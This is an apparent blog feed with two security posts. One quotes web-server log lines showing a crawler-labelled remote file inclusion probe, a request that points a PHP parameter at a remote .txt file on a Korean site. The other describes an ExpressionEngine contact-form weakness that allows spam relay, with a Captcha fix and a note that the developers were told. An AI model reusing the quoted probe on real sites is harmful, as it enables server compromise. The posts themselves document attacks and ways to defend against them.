Autarchy of the Private Cave » vulnerability https://bogdan.org.ua Tiny bits of bioinformatics, [web-]programming etc Wed, 28 Dec 2022 16:09:04 +0000 en-US hourly 1 https://wordpress.org/?v=3.8.27 Yandex probing for vulnerabilities in .UA domains?https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html#comments Mon, 11 Apr 2016 17:11:45 +0000 http://bogdan.org.ua/?p=2393 Here is a recent entry from my web-server’s access log:

bogdan.org.ua:80 130.193.51.57 – - [09/Apr/2016:15:53:22 +0300] “GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1″ 200 13158 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

Client’s IP 130.193.51.57 does belong to Yandex network range.

So…

  • Had Yandex started looking for vulnerabilities in the web-sites it scans?
  • Does it only look for vulnerabilities in the .UA web-sites/domains?
  • Does Yandex really use a Korean web-site to host malicious code?

In fact, there are more entries like that one, also from one of Yandex IPs:

bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:14:22 +0300] “GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12607 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:19:31 +0300] “GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12174 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

I can see 3 explanations, and all of them are bad for Yandex:

  • Yandex now belongs to KGB, and it does scan [.UA] web-sites for vulnerabilities;
  • some/many of Yandex crawler servers are compromised, and are used by malicious 3rd parties;
  • there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.

Share

]]> https://bogdan.org.ua/2016/04/11/yandex-probing-for-vulnerabilities-in-ua-domains.html/feed 0 ExpressionEngine contact form (email module) spam vulnerabilityhttps://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html#comments Mon, 26 Jan 2009 09:50:05 +0000 http://bogdan.org.ua/?p=575 Yesterday I had a look at mod.email.php – the Email module of ExpressionEngine CMS.

It appears that it is very easy to use ExpressionEngine’s contact form (which uses Email module) to send emails to arbitrary addresses – simply put, send spam using someone’s EE.

And here’s why:

  • recipients hidden field is passed to the client; it is encrypted, but with access to the mod.email.php code, it is a matter of several minutes to write your own email-encoding function which will produce a completely valid recipients field
  • there’s also XID field, which seems to be unique for each page load

Spamming algorithm is clear, so I won’t elaborate. (I could have missed some session variables, though – didn’t check them.)

This information is valid as of ExpressionEngine 1.6.6, but nothing in the change-logs indicates that this mechanism was modified in the newer versions of EE.

Update: I’ve tested, and this vulnerability does exist. The simplest prevention measure is to enable Captcha for Contact Form.

I’ve notified the developers.

Share

]]> https://bogdan.org.ua/2009/01/26/expressionengine-contact-form-email-module-spam-vulnerability.html/feed 1